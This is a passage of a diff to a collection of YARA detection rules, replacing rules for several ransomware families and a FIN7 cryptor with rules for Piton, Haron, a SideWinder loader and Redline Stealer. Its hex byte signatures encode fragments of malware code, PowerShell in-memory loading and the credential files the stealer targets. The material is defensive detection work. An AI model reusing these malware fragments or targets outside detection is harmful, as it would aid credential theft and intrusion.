2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 54 45 53 54 49 4e 47 20 4b 45 59 2d 2d 2d 2d 2d } - $op6 = { 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 54 45 53 54 49 4e 47 20 4b 45 59 2d 2d 2d 2d 2d } + $vmp0 = { 2E 76 6D 70 30 00 00 00 } + $vmp1 = { 2E 76 6D 70 31 00 00 00 } condition: - uint16(0)==0x4d5a and filesize >800KB and (pe.imphash()=="91802a615b3a5c4bcc05bc5f66a5b219") and 3 of ($c*) and 3 of ($p*) and 3 of ($op*) + uint16(0)==0x5a4d and filesize >5000KB and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].issuer contains "GlobalSign" and pe.signatures[i].serial=="68:65:29:4f:67:f0:c3:bb:2e:19:1f:75") and $vmp0 in (0x100..0x300) and $vmp1 in (0x100..0x300) } -rule ARKBIRD_SOLG_RAN_Mountlocker_May_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_Piton_Nov_2021_1 : FILE { meta: - description = "Detect the Mountlocker ransomware" + description = "Detect Piton variant (rebuild from the Babuk leaks)" author = "Arkbird_SOLG" - id = "0bc0d341-4658-500e-b487-1993e5431560" - date = "2020-05-12" - modified = "2021-05-16" + id = "433d0692-553b-5efe-84e4-134e99342fe5" + date = "2021-11-03" + modified = "2021-11-04" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-12/Astrolocker/RAN_MountLocker_May_2021_1.yara#L1-L20" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-04/RAN_Piton_Nov_2021_1.yara#L1-L18" license_url = "N/A" - logic_hash = "c0826d4c740b5c46b704b42e002602dd0cda2b6d1bf0ba5431877be8bd600b64" + logic_hash = "cd8287b3be0f8f9338cf6ba8eb24dd9a6f91a54c984a635e1103f7e6028cbf3c" score = 75 quality = 75 tags = "FILE" - hash1 = "0aa8099c5a65062ba4baec8274e1a0650ff36e757a91312e1755fded50a79d47" - hash2 = "f570d5b17671e6f3e56eae6ad87be3a6bbfac46c677e478618afd9f59bf35963" - hash3 = "5eae13527d4e39059025c3e56dad966cf67476fe7830090e40c14d0a4046adf0" - tlp = "White" - adversary = "MountLocker" + hash1 = "71936bc3ee40c7ea678889d2ad5fa7eb39401752cd58988ce462f9d4048578ac" + hash2 = "77c7839c7e8d4aaf52e33a2f29db8459381b5cc3b2700072305a8bae5e0762a9" + hash3 = "ae6020a06d2a95cbe91b439f4433e87d198547dec629ab0900ccfe17e729cff1" + tlp = "white" + adversary = "RAAS" strings: - $seq_Sep_2020_1 = { 40 53 48 81 ec f0 02 00 00 b9 e8 03 00 00 ff 15 ec 1a 00 00 bb 68 00 00 00 48 8d 4c 24 70 44 8b c3 33 d2 e8 9c 00 00 00 ba 04 01 00 00 89 5c 24 70 48 8d 8c 24 e0 00 00 00 ff 15 51 1a 00 00 48 8d 15 a2 9c 00 00 48 8d 8c 24 e0 00 00 00 ff 15 64 1a 00 00 48 8d 44 24 50 45 33 c9 48 89 44 24 48 48 8d 94 24 e0 00 00 00 48 8d 44 24 70 45 33 c0 48 89 44 24 40 33 c9 48 83 64 24 38 00 48 83 64 24 30 00 c7 44 24 28 10 00 00 00 83 64 24 20 00 ff 15 c1 19 00 00 8b d8 85 c0 74 16 48 8b 4c 24 58 ff 15 50 1a 00 00 48 8b 4c 24 50 ff 15 45 1a 00 00 8b c3 48 81 c4 f0 02 } - $seq_Sep_2020_2 = { 68 00 00 00 f0 6a 01 68 a0 51 00 10 57 8d 45 f8 89 5d f4 50 89 7d f8 89 7d fc ff 15 30 50 00 10 85 c0 0f 84 81 00 00 00 8d 45 fc 50 57 57 68 14 01 00 00 68 d0 d0 00 10 ff 75 f8 ff 15 08 50 00 10 8b f0 85 f6 74 26 68 00 01 00 00 8d 45 f4 50 68 60 42 01 10 57 6a 01 57 ff 75 fc ff 15 04 50 00 10 ff 75 fc 8b f0 ff 15 00 50 00 10 57 ff 75 f8 ff 15 0c 50 00 10 } - $seq_Jan_2021_1 = { 48 21 4d 77 4c 8d 05 [2] 00 00 48 21 4d 6f ?? 8b ?? 48 8d 4d 77 [6-9] c7 44 24 20 00 00 00 f0 ff 15 [2] 00 00 85 c0 0f 84 [2] 00 00 48 8b 4d 77 48 8d 45 6f 48 89 44 24 28 48 8d [3] 00 00 83 64 24 20 00 [2-5] c9 41 b8 14 01 00 00 ff 15 [2] 00 00 8b d8 85 c0 74 3b 48 8b 4d 6f 48 8d 45 67 c7 44 24 30 00 01 00 00 45 33 c9 48 89 44 24 28 ?? 8b ?? 48 8d 05 [2-3] 00 33 d2 48 89 44 24 20 ff 15 [2] 00 00 48 8b 4d 6f 8b d8 ff 15 [2] 00 00 48 8b 4d 77 33 d2 ff 15 [2] 00 00 85 db [4-12] 00 00 48 8d } - $seq_Jan_2021_2 = { 4c 8d 05 20 47 00 00 41 8b ce 48 8d 15 1e 47 00 00 e8 [2] 00 00 ba 04 01 00 00 48 8d 4c 24 40 ff 15 ?? 43 00 00 85 c0 75 12 b8 5c 00 00 00 c7 44 24 40 43 00 3a 00 66 89 44 24 44 89 6c 24 38 4c 8d 8c 24 78 02 00 00 48 89 6c 24 30 48 8d 4c 24 40 48 89 6c 24 28 45 33 c0 33 d2 48 89 6c 24 20 66 89 6c 24 46 ff 15 6b 44 00 00 44 8b 84 24 78 02 00 00 48 8d 15 e4 45 00 00 85 c0 b9 bd 07 a2 41 44 0f 44 c1 41 8b c8 44 89 84 24 78 02 00 00 c1 c9 09 41 8b c0 89 4c 24 28 45 8b c8 c1 c8 06 48 8d 4c 24 40 41 c1 c9 03 89 44 24 20 ff 15 8b 44 00 00 4c 8d 44 24 40 33 d2 33 c9 ff 15 ?? 42 00 00 48 85 c0 74 1b ff 15 [2] 00 00 3d b7 00 00 00 74 0e bf 01 00 00 00 48 8d 15 fe 45 00 00 eb 09 8b fd 48 8d 15 a3 45 00 00 41 8b } + $s1 = { 68 38 3c 40 00 6a 00 68 01 00 1f 00 ff 15 c4 50 41 00 85 c0 75 11 68 58 3c 40 00 6a 00 6a 00 ff 15 98 50 41 00 eb 0a e9 b0 00 00 00 e9 ab 00 00 00 c7 45 a8 00 00 00 00 68 78 3c 40 00 8b 55 c8 52 8b 45 e8 50 e8 86 9b ff ff 83 c4 0c 0f b6 c8 83 f9 01 75 0c 8b 55 a8 52 e8 02 f9 ff ff 83 c4 04 e8 ea 94 ff ff ff 15 04 51 41 00 89 45 c0 83 7d c0 00 74 3f b8 41 00 00 00 66 89 45 f0 eb 0c 66 8b 4d f0 66 83 c1 01 66 89 4d f0 0f b7 55 f0 83 fa 5a 7f 1f 8b 45 c0 83 e0 01 74 } + $s2 = { 68 80 16 40 00 ff 15 38 50 41 00 89 45 f0 68 90 16 40 00 8b 45 f0 50 ff 15 34 50 41 00 89 45 fc 83 7d fc 00 74 07 8d 4d f8 51 ff 55 fc 6a 00 6a 00 68 b0 16 40 00 68 08 17 40 00 68 18 17 40 00 6a 00 ff 15 4c 51 41 00 e8 9d 03 00 00 85 c0 74 2d 68 24 17 40 00 ff 15 38 50 41 00 89 45 ec 68 34 17 40 00 8b 55 ec 52 ff 15 34 50 41 00 89 45 f4 83 7d } + $s3 = { 81 ec f4 02 00 00 c7 85 7c ff ff ff 90 15 40 00 c7 45 80 98 15 40 00 c7 45 84 a0 15 40 00 c7 45 88 a8 15 40 00 c7 45 8c b0 15 40 00 c7 45 90 b8 15 40 00 c7 45 94 c0 15 40 00 c7 45 98 c8 15 40 00 c7 45 9c d0 15 40 00 c7 45 a0 d8 15 40 00 c7 45 a4 e0 15 40 00 c7 45 a8 e8 15 40 00 c7 45 ac f0 15 40 00 c7 45 b0 f8 15 40 00 c7 45 b4 00 16 40 00 c7 45 b8 08 16 40 00 c7 45 bc 10 16 40 00 c7 45 c0 18 16 40 00 c7 45 c4 20 16 40 00 c7 45 c8 28 16 40 00 c7 45 cc 30 16 40 00 c7 45 d0 38 16 40 00 c7 45 d4 40 16 40 00 c7 45 d8 48 16 40 00 c7 45 dc 50 16 40 00 c7 45 e0 58 16 40 00 c7 45 fc 00 00 00 00 c7 45 e4 78 00 00 00 c7 45 e8 00 00 00 00 c7 45 f4 00 00 00 00 eb 09 8b 45 f4 83 c0 01 89 45 f4 83 7d f4 1a 7d 35 8b 4d f4 8b 94 8d 7c ff ff ff 52 ff 15 f8 50 41 00 83 f8 01 75 1d 8b 45 fc 8b 4d f4 8b 94 8d 7c ff ff ff 89 94 85 14 ff ff ff 8b 45 fc 83 c0 01 89 45 fc eb bc b9 02 00 00 00 6b d1 00 33 c0 66 89 84 15 0c fd ff ff 68 00 00 01 00 e8 00 e8 00 00 83 c4 04 89 45 f8 83 7d f8 00 0f 84 d4 00 00 00 68 00 00 01 00 e8 e6 e7 00 00 83 c4 04 89 45 ec 83 7d ec 00 0f 84 ae 00 00 00 68 00 80 00 00 8b 4d f8 51 ff 15 08 51 41 00 89 45 f0 83 7d fc 00 76 63 8d 55 e8 52 8b 45 e4 50 8d 8d 0c fd ff ff 51 8b 55 f8 52 ff 15 f4 50 41 00 85 c0 74 26 8d 85 0c fd ff ff 50 ff 15 40 50 41 00 83 f8 03 75 14 b9 02 00 00 00 6b d1 00 33 c0 66 89 84 15 0c fd ff ff eb 22 8b 4d fc 83 e9 01 89 4d fc 8b 55 f8 52 8b 45 fc 8b 8c 85 14 ff ff ff 51 ff 15 44 50 41 00 eb 02 eb 1b 68 00 80 00 00 8b 55 f8 52 8b 45 f0 50 ff 15 00 51 41 00 85 c0 0f 85 7a ff ff ff 8b 4d f0 51 ff 15 fc 50 41 00 8b 55 } condition: - uint16(0)==0x5a4d and filesize >30KB and 1 of ($seq*) + uint16(0)==0x5a4d and filesize >30KB and all of them } -rule ARKBIRD_SOLG_RAN_Astrolocker_May_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_Haron_Aug_2021_1 : FILE { meta: - description = "Detect the Astrolocker ransomware" + description = "Detect Haron locker" author = "Arkbird_SOLG" - id = "f2c2c96a-277e-575b-8d80-4729f4a1cfe4" - date = "2020-05-12" - modified = "2021-05-16" + id = "5900ad0e-66ca-5127-b8c2-cc23ace8929f" + date = "2021-08-09" + modified = "2021-08-09" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-12/Astrolocker/RAN_Astrolocker_May_2021_1.yara#L1-L18" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-09/RAN_Haron_Aug_2021_1.yara#L1-L22" license_url = "N/A" - logic_hash = "7e50642f5f864b7cffeb5ccf4581ac7566da24fd5361a3303a860f036cd6d439" - score = 50 + logic_hash = "5001041d9bb8acc0fa5e0e3b4cfacc5a891bed6885101ae3513b5524c91c572d" + score = 75 quality = 75 tags = "FILE" - hash1 = "7fe1686f4afb9907f880a5e77bf30bc00fae71980f57ca70b60b7b1716456a2f" - hash2 = "b26749b17ca691328ba67ee49d4d9997c101966c607ab578afad204459b7bf8f" - tlp = "White" - adversary = "-" - level = "Experimental" + hash1 = "66ed5384220ff3091903e14a54849f824fdd13ac70dc4e0127eb59c1de801fc2" + hash2 = "6e6b78a1df17d6718daa857827a2a364b7627d9bfd6672406ad72b276014209c" + tlp = "white" + adversary = "Haron" strings: - $seq_Mar_2021_1 = { 6a 00 6a 00 ff 15 88 60 41 00 81 3d cc e6 b8 02 57 0f 00 00 8b 0d b4 c4 41 00 8b 15 b8 c4 41 00 a1 bc c4 41 00 89 4c 24 2c 89 54 24 20 89 44 24 24 75 14 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 28 60 41 00 8b 2d a8 60 41 00 c7 44 24 1c 20 00 00 00 8d 9b 00 00 00 00 8b 54 24 18 8b ce c1 e1 04 03 4c 24 20 8b c6 c1 e8 05 89 4c 24 14 8d 0c 32 89 44 24 10 8b 44 24 24 01 44 24 10 31 4c 24 14 81 3d cc e6 b8 02 f5 03 00 00 c7 05 0c da b8 02 36 06 ea e9 75 08 6a 00 ff 15 5c 60 41 00 8b 4c 24 14 31 4c 24 10 83 3d cc e6 b8 02 42 75 30 6a 00 6a 00 6a 00 ff d5 6a 30 8d 54 24 3c 6a 00 52 c7 44 24 40 00 00 00 00 e8 5a 5e ff ff 83 c4 0c 6a 00 8d 44 24 38 50 6a 00 ff 15 00 60 41 00 2b 5c 24 10 8b cb c1 e1 04 81 3d cc e6 b8 02 8c 07 00 00 89 4c 24 14 75 09 6a 00 6a 00 e8 d2 eb fe ff } - $seq_Apr_2021_1 = { 89 44 24 38 48 8b 05 78 4e 00 00 48 89 05 b9 9e 00 00 48 8b 05 52 4e 00 00 48 89 05 b3 9e 00 00 48 8b 05 4c 4e 00 00 48 89 05 ad 9e 00 00 48 8b 05 46 4e 00 00 48 89 05 a7 9e 00 00 8b 05 51 9e } + $s1 = { 02 17 8d ?? 00 00 01 [2] 16 20 [2] 00 00 20 00 ?? 00 00 [1-5] 73 [2] 01 00 0a a2 ?? 7d ?? 01 00 0a } + $s2 = { 03 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 ?? 00 00 06 } + $s3 = { 1f 38 16 02 28 ?? 01 00 0a 16 9a 6f ?? 01 00 0a b8 28 ?? 00 00 06 13 07 7e ?? 01 00 0a 13 0b 11 07 11 0b 11 06 6e 1f 60 6a d7 88 20 00 30 00 00 1f 40 28 ?? 00 00 06 28 ?? 01 00 0a b8 13 08 11 07 02 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 ?? 00 00 06 28 ?? 01 00 0a b8 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 ?? 00 00 06 84 b8 13 09 11 07 02 7e } + $s4 = { 1f 18 02 28 ?? 01 00 0a 16 9a 6f ?? 01 00 0a b8 28 ?? 00 00 06 0a 7e ?? 01 00 0a 0b 06 07 28 ?? 01 00 0a 0c 08 2c 04 07 0d 2b 6f 12 04 fe 15 ?? 00 00 02 12 04 11 04 28 ?? 00 00 2b b8 7d ?? 00 00 04 06 12 04 28 ?? 00 00 06 0c 08 2c 4a 12 04 7c ?? 00 00 04 28 ?? 01 00 0a 20 ff ff ff 7f 6a fe 02 16 fe 01 13 05 11 05 2c 17 03 12 04 7b ?? 00 00 04 17 28 ?? 01 00 0a 16 fe 01 13 06 11 06 2d 0c 06 12 04 28 ?? 00 00 06 2d c2 2b 0a 12 04 7b ?? 00 00 04 0d 09 2a 07 0d 09 2a } + $s5 = { 28 0e 00 00 0a 0b 16 0c 38 84 01 00 00 07 08 9a 0a 06 6f ?? 01 00 0a 20 00 00 80 0c 6a 3e 66 01 00 00 06 6f 0d 00 00 0a 28 0c 00 00 0a 6f 0d 00 00 0a 28 21 00 00 0a 39 4c 01 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a 2d 01 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a 0e 01 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a ef 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a d0 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a b1 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a 92 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 76 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 5a 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 3e 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 22 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 06 06 6f 26 00 00 0a de 03 26 de 00 08 17 58 0c 08 07 8e 69 3f 73 fe ff ff 20 c4 09 00 00 28 18 00 00 0a dd 57 fe ff ff 26 dd 51 fe ff ff } + $s6 = { 7e ?? 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 09 00 00 06 6f [2] 00 0a 0a 06 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 09 00 00 06 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f [2] 00 0a 06 6f ?? 00 00 0a de 03 26 de 00 2a } + $s7 = { 28 ?? 00 00 06 0a 02 06 28 ?? 00 00 06 0b 07 6f [2] 00 0a 16 16 17 20 ff 0f 1f 00 17 14 73 [2] 00 0a 16 14 73 [2] 00 0a 6f [2] 00 0a 02 06 07 28 ?? 00 00 06 de 03 26 de 00 2a 00 00 00 } condition: - uint16(0)==0x5a4d and filesize >30KB and 1 of ($seq*) + uint16(0)==0x5A4D and filesize >25KB and 6 of ($s*) } -rule ARKBIRD_SOLG_CRIM_FIN7_PS_Cryptor_Jun_2021_1 : FILE +import "pe" + +rule ARKBIRD_SOLG_APT_Sidewinder_NET_Loader_Aug_2020_1 : FILE { meta: - description = "Detect PS Cryptor used by FIN7 for Diceloader and Carbanak" + description = "Detected the NET loader used by SideWinder group (August 2020)" author = "Arkbird_SOLG" - id = "26361500-c33e-59c8-a53f-a881966c71a7" - date = "2021-06-07" - modified = "2021-06-07" - reference = "https://twitter.com/z0ul_/status/1401795117678219267" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-07/FIN7/CRIM_FIN7_PS_Cryptor_Jun_2021_1.yara#L1-L28" + id = "7334a3b8-cd56-5820-a073-5bd22076644f" + date = "2020-08-24" + modified = "2020-08-24" + reference = "https://twitter.com/ShadowChasing1/status/1297902086747598852" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-24/SideWinder/APT_SideWinder_NET_Loader_Aug_2020_1.yar#L3-L21" license_url = "N/A" - logic_hash = "d7eadaa6dec75ecfa2f03860f41b39dbe9e7ffc9e6ad743497586356301ef67c" + logic_hash = "b40127cd845d75ef81eb230c12635da00dd77fc53e5886c253a2466627aa8534" score = 75 - quality = 55 + quality = 73 tags = "FILE" - hash1 = "944e47dc9da19b753beba173214cdebea2aa3651c402dfacae2dde82c4fdaa43" - hash2 = "fada67a9f89429d6c191cd6fef5d75cd7b49eebaa2e40d1dd1f9884b3038a23b" - hash3 = "0f083aac77fb734a8e81fb9dff218f0414ac6c4c9a23b2832837fbc2c7e2031d" - hash4 = "dc9442838b464e96281a32705c9b5958e4f45dbefd1ef4a885fac9898af0a4b7" - hash5 = "fad295cf65552061dc553c21d89d8bbd0b02783c01f5e696232df6a14381c206" - tlp = "White" - adversary = "FIN7" + hash1 = "4a0947dd9148b3d5922651a6221afc510afcb0dfa69d08ee69429c4c75d4c8b4" strings: - $s1 = { 3d 4e 65 77 2d 4f 62 6a 65 63 74 20 49 4f 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 2e 44 65 66 6c 61 74 65 53 74 72 65 61 6d 28 5b 49 4f 2e 4d 65 6d 6f 72 79 53 74 72 65 61 6d 5d 5b 42 79 74 65 5b 5d [6-12] 5b 49 4f 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 4d 6f 64 65 5d 3a 3a 44 65 63 6f 6d 70 72 65 73 73 29 } - $s2 = { 40 28 5b 49 6e 74 50 74 72 5d 2c 5b 55 49 6e 74 33 32 5d 2c 5b 55 49 6e 74 33 32 5d 2c 5b 55 49 6e 74 33 32 5d 29 28 5b 49 6e 74 50 74 72 5d 29 } - $s3 = { 2c 20 24 6e 75 6c 6c 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 41 6e 79 2c 20 40 28 28 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 48 61 6e 64 6c 65 52 65 66 29 2e 47 65 74 54 79 70 65 28 29 2c 20 5b 73 74 72 69 6e 67 5d 29 2c 20 24 6e 75 6c 6c } - $s4 = { 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 47 65 74 44 65 6c 65 67 61 74 65 46 6f 72 46 75 6e 63 74 69 6f 6e 50 6f 69 6e 74 65 72 28 } - $s5 = { 2c 20 24 6e 75 6c 6c 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 41 6e 79 2c 20 40 28 5b 73 74 72 69 6e 67 5d 29 2c 20 24 6e 75 6c 6c 29 } - $s6 = { 5b 41 70 70 44 6f 6d 61 69 6e 5d 3a 3a 43 75 72 72 65 6e 74 44 6f 6d 61 69 6e 2e 47 65 74 41 73 73 65 6d 62 6c 69 65 73 28 29 20 7c 20 57 68 65 72 65 2d 4f 62 6a 65 63 74 20 7b 20 24 5f 2e 47 6c 6f 62 61 6c 41 73 73 65 6d 62 6c 79 43 61 63 68 65 20 2d 41 6e 64 20 24 5f 2e 4c 6f 63 61 74 69 6f 6e 2e 53 70 6c 69 74 28 27 5c 5c 27 29 5b 2d 31 5d 2e 45 71 75 61 6c 73 28 28 } - $s7 = { 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 53 74 61 6e 64 61 72 64 2c } - $s8 = { 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 48 61 6e 64 6c 65 52 65 66 5d 28 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 48 61 6e 64 6c 65 52 65 66 28 24 } - $s9 = { 3d 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 47 65 74 44 65 6c 65 67 61 74 65 46 6f 72 46 75 6e 63 74 69 6f 6e 50 6f 69 6e 74 65 72 28 24 } - $s10 = { 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 43 6f 70 79 28 24 } - $s11 = { 3d 5b 49 6e 74 50 74 72 5d 3a 3a 5a 65 72 6f } + $s1 = "DUSER.dll" fullword wide + $s2 = "UHJvZ3JhbQ==" fullword wide + $s3 = ".tmp " fullword wide + $s4 = "U3RhcnQ=" fullword wide + $s5 = "Gadgets" fullword ascii + $s6 = "AdapterInterfaceTemplateObject" fullword ascii + $s7 = "FileRipper" fullword ascii + $s8 = "copytight @" fullword wide condition: - filesize >40KB and 8 of ($s*) + uint16(0)==0x5a4d and filesize <4KB and ((pe.exports("FileRipper") and pe.exports("Gadgets")) and 5 of them ) } -rule ARKBIRD_SOLG_APK_Droidwatcher_Nov_2021_1 : FILE +rule ARKBIRD_SOLG_Mal_Stealer_NET_Redline_Aug_2020_1 : FILE { meta: - description = "Detect modified DroidWatcher stealer used by Void Balaur group" + description = "Detect Redline Stealer (August 2020)" author = "Arkbird_SOLG" - id = "04e02521-d89a-5f72-8b6f-0350f6defdd0" - date = "2021-11-11" - modified = "2021-11-12" - reference = "https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-11/Void_Balaur/APK_DroidWatcher_Nov_2021_1.yara#L1-L19" + id = "6fda87c3-0d00-5c00-a1ff-6d96dd726ddf" + date = "2020-08-24" + modified = "2020-08-24" + reference = "https://twitter.com/JAMESWT_MHT/status/1297878628450152448" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-24/Redline/Mal_Stealer_NET_Redline_Aug_2020_1.yar#L1-L31" license_url = "N/A" - logic_hash = "c16bcdd5d9cd6a3cbb527893e13ac967211d1686edd9f7ae03e37feada725a1b" - score = 50 + logic_hash = "950641dfaf17f332e6a18961aebb2533732d82ce69f3617efa08cc63272f1786" + score = 75 quality = 75 tags = "FILE" - hash1 = "902c5f46ac101b6f30032d4c5c86ecec115add3605fb0d66057130b6e11c57e6" - tlp = "white" - level = "Experimental" - adversary = "Void Balaur" + hash1 = "4195430d95ac1ede9bc986728fc4211a1e000a9ba05a3e968dd302c36ab0aca0" strings: - $s1 = { 38 50 F4 59 CC FF F3 37 65 28 4F 35 1A D2 83 C9 6C E0 20 27 38 C5 39 2E 72 95 5B 3C E0 29 D1 9E C7 0C A4 21 1B 55 09 A5 0B 83 99 C8 7C D6 F2 0F 47 B9 CE 43 82 5E C4 0C } - $s2 = { 3C E2 39 81 D4 EA 82 1F F8 83 42 54 A0 2E 6D E8 C5 44 E6 B0 92 13 5C E6 21 EF 89 9D 26 28 90 8C 3C 94 A3 36 AD E9 CD 48 26 B2 92 1D 1C E4 34 57 B9 C7 2B A2 7D 1E 14 A8 4A 4D 5A D3 8E 2E F4 A4 1F 83 19 C1 58 A6 32 9B 05 2C 63 03 DB B9 42 } - $s3 = { F0 96 6F 33 59 1B BA 32 82 8D 5C 22 28 B3 1E 4C 65 BA 31 99 4D 1C E0 2E 89 7E F3 1E 94 A7 13 13 08 E7 22 31 7E D7 EB 28 42 53 46 B0 81 73 7C 22 E3 1F 62 4E 17 66 B2 8F 47 A4 CA A2 D6 68 C9 44 36 72 9D 78 7F 7A 16 B5 18 CA 5A 4E F2 92 74 59 } - $s4 = { 3D 57 89 56 4D 9E 51 9C CE 2C 20 92 B8 D5 C5 81 7A 8C 65 03 17 F9 C0 77 35 5C 4F 0B 26 B0 99 0B C4 A9 69 5D A9 44 0F 66 F2 2F F7 48 5C 4B 7E 50 9D 41 2C E0 34 AF 89 5F 5B 9E 50 92 C6 F4 65 3C 0B D8 CA 1E CE F3 80 CF EA B8 9E 94 A4 E5 37 72 51 88 0A 34 A3 2F 03 19 CE 41 22 B8 C9 5D 1E F2 82 77 44 AF AB } - $s5 = { FA D6 A4 0F EB 79 42 D2 76 F6 54 BA B2 9A 27 FC D0 5E 9E 30 8D 2B 24 E9 A0 AE A8 41 33 06 32 84 51 8C 63 12 33 98 CF 72 36 B0 8B 83 1C E3 12 D7 B8 CD 63 5E 13 B3 A3 FE 45 06 8A D0 80 3E 0C 66 32 33 59 C6 66 0E 10 C1 39 AE F3 84 D7 C4 EF E4 EC C8 37 64 22 17 F9 28 42 45 3A 31 9E A5 EC E1 14 37 79 C0 DB FF FD B6 B3 E7 F3 3B 45 A9 45 28 E3 D9 } + $s1 = { 53 00 45 00 4c 00 45 00 43 00 54 00 20 00 2a 00 20 00 46 00 52 00 4f 00 4d 00 20 00 57 00 69 00 6e 00 33 00 32 00 5f 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 20 00 57 00 68 00 65 00 72 00 65 00 20 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 49 00 64 00 3d 00 27 00 7b 00 30 00 7d } + $s2 = { 28 00 28 00 28 00 28 00 5b 00 30 00 2d 00 39 00 2e 00 5d 00 29 00 5c 00 64 00 29 00 2b 00 29 00 7b 00 31 00 7d 00 29 } + $s3 = { 7b 00 30 00 7d 00 5c 00 46 00 69 00 6c 00 65 00 5a 00 69 00 6c 00 6c 00 61 00 5c 00 72 00 65 00 63 00 65 00 6e 00 74 00 73 00 65 00 72 00 76 00 65 00 72 00 73 00 2e 00 78 00 6d 00 6c } + $s4 = { 7b 00 30 00 7d 00 5c 00 46 00 69 00 6c 00 65 00 5a 00 69 00 6c 00 6c 00 61 00 5c 00 73 00 69 00 74 00 65 00 6d 00 61 00 6e 00 61 00 67 00 65 00 72 00 2e 00 78 00 6d 00 6c } + $s5 = { 53 00 6f 00 66 00 74 00 77 00 61 00 72 00 65 00 5c 00 4d 00 61 00 72 00 74 00 69 00 6e 00 20 00 50 00 72 00 69 00 6b 00 72 00 79 00 6c 00 5c 00 57 00 69 00 6e 00 53 00 43 00 50 00 20 00 32 00 5c 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 73 } + $s6 = "<encrypted_key>k__BackingField" fullword ascii + $s7 = "set_encrypted_key" fullword ascii + $s8 = "UserAgentDetector" fullword ascii + $s9 = "set_encrypted_key" fullword ascii + $s10 = "set_FtpConnections" fullword ascii + $s11 = 